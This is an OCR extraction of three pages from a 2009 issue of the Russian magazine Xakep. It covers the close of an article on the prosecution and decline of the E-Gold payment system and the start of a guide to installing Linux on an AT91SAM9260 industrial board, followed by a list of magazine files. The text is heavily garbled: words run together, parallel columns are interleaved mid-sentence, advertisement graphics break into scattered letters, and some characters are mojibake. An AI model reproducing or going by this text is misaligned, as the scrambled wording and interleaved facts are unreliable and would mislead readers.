«ОСНОВНАЯПРОБЛЕМАЗАКЛЮЧАЛАСЬВТОМ, ЧТОE-GOLD ФАКТИЧЕСКИНЕТРЕБОВАЛДЛЯРЕГИСТРАЦИИНИКАКИХУДОСТОВЕРЕНИЙ ЛИЧНОСТИ.»

Всамом деле, в E-Gold даже начали уст-

ЗАБВЕНИЕНесмотрянато, чтонапро- тяжениивсейстатьиречьоE-Gold идетв прошедшемвремени, сегоднякомпанияи

076	XÀÊÅÐ 05 /125/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

	Gold
-
E

E	>>
-
	Gold

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
сценаw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ОФИЦИАЛЬНЫЙСАЙТE-GOLD.COM ВЫГЛЯДИТНЕСЛИШКОМСОВРЕМЕННО

самаплатежнаясистемавсеещеживы.	Джексона обязали раскошелиться на $200	видимо, и ожидалось) побежали, словно
Приэтом:	(это не опечатка — двести зеленых бумаж-	крысы с тонущего корабля, и спешно броси-
• созданиеновыхаккаунтов«временно	ных денег), а Дауни и Рейд Джексона — на	лись выводить со своих счетов средства, что
заморожено»;	$2.500 каждого. Но что самое любопытное	тоже не улучшило общего положения дел.
• вывестиденьгисужеимеющегосясчета	— деятельность компании суд так же не	Раздутая вокруг E-Gold паника больно уда-
можнолишьсогромнымтрудом.	пресек. Вместо этого судья Розмари Кольер	рила по курсу «электронного золота» и по-
Ниодинчеловеквздравомуменестанет	постановила, что Gold & Silver Reserve	родила сумасшедшие проценты комиссии.
расплачиватьсячерезE-Gold, но«электрон-	должны оформить все необходимые для	Если сегодня попытаться вывести средст-
ноезолото» нежелаетидтикодну. Затяжная	работы лицензии и привести регистрацию	ва со счета E-Gold, придется попотеть,
агония, начавшаясявсерединедесятилетия,	новых аккаунтов в системе к нормам, пре-	разыскивая обменник и, даже если таковой
продолжаетсядосихпор.	дусмотренным законом.	найдется, — придется заплатить порядка
После первой попытки «штурма» власти	Последнее, впрочем, былосделаноещеза	70% комиссии.
не оставили E-Gold в покое, и в 2007 году	полгодадоокончанияпроцесса. Видимо,	Что будет с E-Gold дальше, сказать слож-
выдвинули против G&SR новый иск со ста-	поняв, чтововторойразсухимиизводыим	но. Несмотря на критическое положение,
рыми претензиями. Ореол крайне сомни-	выйтинеудастся, вE-Gold, наконец, начали	доктор Джексон не унывает. Он охотно
тельной славы, к этому моменту уже плотно	действоватьнаопережение— например,	рассказывает всем, кто готов его слу-
окруживший систему, начал отпугивать	сталитребоватьотпользователейнормаль-	шать, о том, каким модификациям сейчас
рядовых пользователей. Зато, похоже, он	нуюконтактнуюинформацию, регистраци-	подвергается E-Gold, и о ее будущих
ничуть не тревожил аферистов — новые	онныйномерналогоплательщика, атакже	надежности и удобстве. Но техничес-
аккаунты в системе плодились со скоростью	указаниеместажительстваидатырождения.	кая сторона дела, это только полбеды.
примерно 95 тысяч в месяц. Интерес к E-	Плюс, наконец, запретилирегистрировать	Компания пока даже не пытается «по-
Gold снижался — из-за этого золотой фонд	несколькоаккаунтовнаодногочеловекаи	вернуться к пользователям лицом» и не
компании, ранее составлявший почти 3.5	внесливпользовательскоесоглашениеряд	предпринимает попыток хоть как-то реа-
тонны золота, за год сократился почти на	изменений, призванныхподпортитьжизнь	билитироваться в глазах общественнос-
треть. К середине 2008-го от него осталось	кибермошенникам.	ти. Возникает ощущение, что руководс-
лишь 2.420 кг.	Однаковрядлиможносказать, чтовсеснова	тву попросту наплевать на промоушен
В итоге, летом 2008 года, после предва-	закончилосьхорошо. Хотякомпанияфор-	и собственный облик. Чего стоит один
рительных слушаний, руководство E-Gold	мальнодосихпорнезакрыта, еерепутация	только официальный сайт компании,
решило признать свою вину. Очевидно, это	безнадежноиспорчена. Регистрацияновых	вызывающий чувство острой ностальгии
было продуманное решение — учитывая	пользователейзаморожена, процессполу-	по 90-м и молодому интернету.
тяжесть выдвинутых обвинений, вынесен-	чениялицензий, очевидно, затягивается, а	Впрочем, E-Gold на протяжении всей
ный в конце 2008 года приговор оказался	довериедавноподорвано.	ее 13-летней истории всегда везло
слишком уж мягким. Дугласа Джексона, его	В 2008-м масла в огонь подлили и постоян-	и, возможно, повезет еще раз. Шанс,
брата Рейда и Барри Дауни приговорили	ные DDoS-атаки на E-Gold, и пущенная тогда	что компания восстанет из пепла и
к 3 годам условно (включая полгода под	же «утка», гласившая, что систему якобы за-	предстанет перед нами в новом свете,
домашним арестом и электронным наблю-	крыли, E-Gold — банкрот и теперь не сможет	все же, отличен от нуля, тем более что
дением), а также — к 300 часам обществен-	расплатиться со своими клиентами. Из-за	трения с властями, похоже, наконец-то,
ных работ. Всех троих обложили штрафом:	последнего сообщения пользователи (как,	урегулированы.z
XÀÊÅÐ 05 /125/ 09		077

hang

NOW!

BUY

>>m

BUY

w Click

unixoid

w Click

-xcha

-x cha

AT91SAM9260

ALTERA

NAMD256M

Ethernet

ЕВГЕНИЙ «J1M» ЗОБНИН

/ZOBNIN@GMAIL.COM/

ЧЕМПИОН

Ethernet

ВЛЕГКОМВЕСЕ

AT91SAM9260

Практическоеруководствопопоселению

GNU/Linux намикроконтроллере

Цельпроста— научитьсяставитьОСнабазеLinux начто-то, отличноеотвездесущейархитектурыIBM PC. Полагаю, утебяесть такоеустройство, бывшеесовсемнедавномаршрутизатором иликаким-нибудьпромышленнымкомпьютером. Либотыпотратилсяикупилполноценныйодноплатник, чтобыиспользоватьего вкачествеотдельногофайл-сервера. Длятакихфункцийписать снуляпрошивкунеимеетсмысла, авотпоставитьспециальный дистрибутивLinux — самоето!

>> unixoid

KORSET — HIDS БЕЗЛОЖ-

НЫХСРАБАТЫВАНИЙ

Впредыдущемномере, напомню, былаосвещенатеоретическаясторонавопросаипроведен обзорпопулярныхархитектуридистрибутивов длявстраиваемыхустройств. Сегоднязаймемся собственноустановкойЛинукса.

Понятно, чтовтвоемслучаеможетбытьсовершеннодругаяплатасдругимконтроллером. Нопрограммированиевстраиваемыхустройств всегдапроходитпооднимитемжешагам, поэтому, научившисьвседелатьнамоемпримере, нетрудноперенестиполученныйопытнатвой девайс, чутокподправивалгоритм. Отличия будут, ночащевсего— несущественные, причемвсетонкостипрошивкиотдельновзятого устройстваподробноописываютсявDatasheet кконтроллеруинасайтепроизводителя. Также, дляуспешногозавершениямиссии, неплохобыиметьбазовыезнанияпопроцессу загрузкиLinux изнать, чтоесть«периферия», «контроллер», «файловаясистема». Передтем, какчто-либопрошивать, получимаксимумин-

формацииоподопытномустройстве: перепиши маркировкимикросхем, узнайобъемитипы памяти, почитайофициальныйсайтифорумы. Наверняка, тынепервый, ктоустанавливает Linux наподобныйдевайс— иучитьсялучше начужихошибках, чемнасвоих.

Делатьвсебудемпошагам. Ипомни, ситуация неявляетсябезвыходнойдотехпор, покаизустройстванепойдетдым:).

КАПРИЗНЫЙМОНСТР

(две микросхемы по 32 Мб шириной 16 бит)

•NAND-Flash: 256 Ìá

•DataFlash íà SPI-интерфейсе Atmel AT45DB041B: 1 Мб

•Микросхема физического уровня Ethernet, совместимая с IEEE 802.3: Micrel KSZ8041TL

•На плату также выведены USB-хост и DBGU-интерфейс

Уменяестьпромышленныйкомпьютер	Надопомнить, чтоAT91SAM9260 уженесовсем
sh27cnc1, припроектированиикоторогобыл	микроконтроллервтомсмысле, которыймы
взятзаосновуAtmel’овскийотладочныйнабор	привыкливкладыватьвэтопонятие. Ведьвнут-
AT91SAM9260-EK идобавленонесколькоузлов	риунегонуоченьмноговсякойразнообразной
типаПЛИС(программируемыелогическиеин-	периферии, начинаясЦАПадлявыводазвука
тегральныесхемы) откомпанииAltera, атакже	изаканчиваяконтроллерамилокалки(EMAC —
парапараллельныхпортов. Вотегоключевые	уровеньEthernet) иFlash-памяти. Вэтомсмыс-
компоненты:	ле9260 — самый, чтонинаесть, компьютер-на-
	кристалле. Носдругойстороны, оперативной
• Микроконтроллер Atmel AT91SAM9260	памятиунеговнутри— всего8 Кб, изкоторых
в корпусе PQFP	тебедоступнотолько4, аэнергонезависимой
• Оперативная память: 64 Мб SDRAM	тамнетвообще. Этотнедостатокприходится

078	XÀÊÅÐ 05 /125/ 09

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202432.48 Mб12120_Optimized.pdf
#
20.04.202447.9 Mб12121_Optimized.pdf
#
20.04.202449.28 Mб12122_Optimized.pdf
#
20.04.202422.66 Mб12123_Optimized.pdf
#
20.04.202414.76 Mб12124_Optimized.pdf
#
20.04.202411.92 Mб12125_Optimized.pdf
#
20.04.202412.83 Mб12126_Optimized.pdf
#
20.04.202416.73 Mб12127_Optimized.pdf
#
20.04.202416.61 Mб12128_Optimized.pdf
#
20.04.202415.04 Mб12129_Optimized.pdf
#
20.04.202417.96 Mб12130_Optimized.pdf